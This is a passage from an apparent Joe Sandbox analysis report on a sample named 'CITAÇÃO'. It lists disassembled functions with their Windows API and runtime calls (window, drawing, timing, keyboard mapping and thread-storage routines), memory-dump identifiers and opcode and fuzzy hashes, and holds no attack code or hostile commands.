                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                      • String ID:
                                                      • API String ID: 3611059338-0
                                                      • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                      • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                      • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                      • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                      Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: DestroyWindow$DeleteObject$IconMove
                                                      • String ID:
                                                      • API String ID: 1640429340-0
                                                      • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                      • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                      • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                      • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                      Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                      • _wcslen.LIBCMT ref: 004438CD
                                                      • _wcslen.LIBCMT ref: 004438E6
                                                      • _wcstok.LIBCMT ref: 004438F8
                                                      • _wcslen.LIBCMT ref: 0044390C
                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                      • _wcstok.LIBCMT ref: 00443931
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                      • String ID:
                                                      • API String ID: 3632110297-0
                                                      • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                      • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                      • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                      • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                      Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Destroy$DeleteMenuObject$IconWindow
                                                      • String ID:
                                                      • API String ID: 752480666-0
                                                      • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                      • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                      • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                      • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                      Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                      • String ID:
                                                      • API String ID: 3275902921-0
                                                      • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                      • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                      • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                      • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                      Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                      • String ID:
                                                      • API String ID: 3275902921-0
                                                      • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                      • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                      • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                      • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                      Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                      • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                      • String ID:
                                                      • API String ID: 2833360925-0
                                                      • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                      • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                      • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                      • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                      Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32 ref: 004555C7
                                                      • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                      • DeleteObject.GDI32(?), ref: 00455736
                                                      • DeleteObject.GDI32(?), ref: 00455744
                                                      • DestroyIcon.USER32(?), ref: 00455752
                                                      • DestroyWindow.USER32(?), ref: 00455760
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                      • String ID:
                                                      • API String ID: 3691411573-0
                                                      • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                      • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                      • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                      • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                      Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                      • LineTo.GDI32(?,?,?), ref: 004472AC
                                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                      • LineTo.GDI32(?,?,?), ref: 004472C6
                                                      • EndPath.GDI32(?), ref: 004472D6
                                                      • StrokePath.GDI32(?), ref: 004472E4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                      • String ID:
                                                      • API String ID: 372113273-0
                                                      • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                      • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                      • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                      • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                      Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 0044CC6D
                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CapsDevice$Release
                                                      • String ID:
                                                      • API String ID: 1035833867-0
                                                      • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                      • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                      • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                      • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                      Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __getptd.LIBCMT ref: 0041708E
                                                        • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                        • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                      • __amsg_exit.LIBCMT ref: 004170AE
                                                      • __lock.LIBCMT ref: 004170BE
                                                      • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                      • _free.LIBCMT ref: 004170EE
                                                      • InterlockedIncrement.KERNEL32(00A62CE8), ref: 00417106
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                      • String ID:
                                                      • API String ID: 3470314060-0
                                                      • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                      • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                      • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                      • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                      Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                      • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                        • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                      • String ID:
                                                      • API String ID: 3495660284-0
                                                      • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                      • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                      • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                      • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                      Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Virtual
                                                      • String ID:
                                                      • API String ID: 4278518827-0
                                                      • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                      • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                      • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                      • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                      Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                      • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                      • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                      • ExitThread.KERNEL32 ref: 004151ED
                                                      • __freefls@4.LIBCMT ref: 00415209
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                      • String ID:
                                                      • API String ID: 442100245-0
                                                      • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                      • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                      • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                      • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
